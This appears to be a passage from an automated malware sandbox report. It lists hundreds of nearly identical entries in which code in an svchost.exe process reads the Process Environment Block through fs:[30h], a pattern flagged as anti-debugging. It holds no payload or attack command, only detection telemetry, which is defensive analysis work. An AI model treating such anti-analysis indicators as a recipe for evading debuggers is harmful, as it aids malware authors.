            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]2_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]2_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
